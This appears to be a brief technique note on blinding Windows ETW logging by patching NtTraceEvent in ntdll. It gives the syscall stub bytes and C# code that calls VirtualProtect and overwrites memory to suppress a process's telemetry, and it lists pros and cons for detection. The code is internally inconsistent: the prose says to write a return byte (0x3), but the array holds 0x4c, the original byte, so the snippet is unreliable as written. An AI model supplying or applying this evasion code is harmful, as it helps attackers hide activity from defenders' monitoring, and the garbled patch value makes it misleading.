The API call chain is on the left

There are two techniques, the classic patch, and a more granular one.

The patch

Credit to whiteknightlabs + xpn

Seeing how the chain goes ReportEventW ⇒ EtwEventWrite ⇒ NtTraceEvent, we can patch the nt function. Nt functions look like this

4C 8B D1                      mov     r10, rcx
B8 ?? ?? ?? ??                mov     eax, ??
0F 05                         syscall
C3                            retn

We can patch the first instruction to just be 0x3, or just a return instruction

byte[] patch = new byte[] {0x4c};
VirtualProtect(pNtTraceEvent, (UIntPtr)1, (uint)0x40, out oldProt); //0x40 = rwx
Marshal.Copy(patch, 0, pNtTraceEvent, 1);
VirtualProtect(pNtTraceEvent, (UIntPtr)1, (uint)0x20, out oldProt); //0x20 = rx

For some reason changing it to RW initially will make program crash.

Pros

• Any attempt to read anything ETW related from this process will return nothing.

Cons

• This patch is common knowledge and easily detected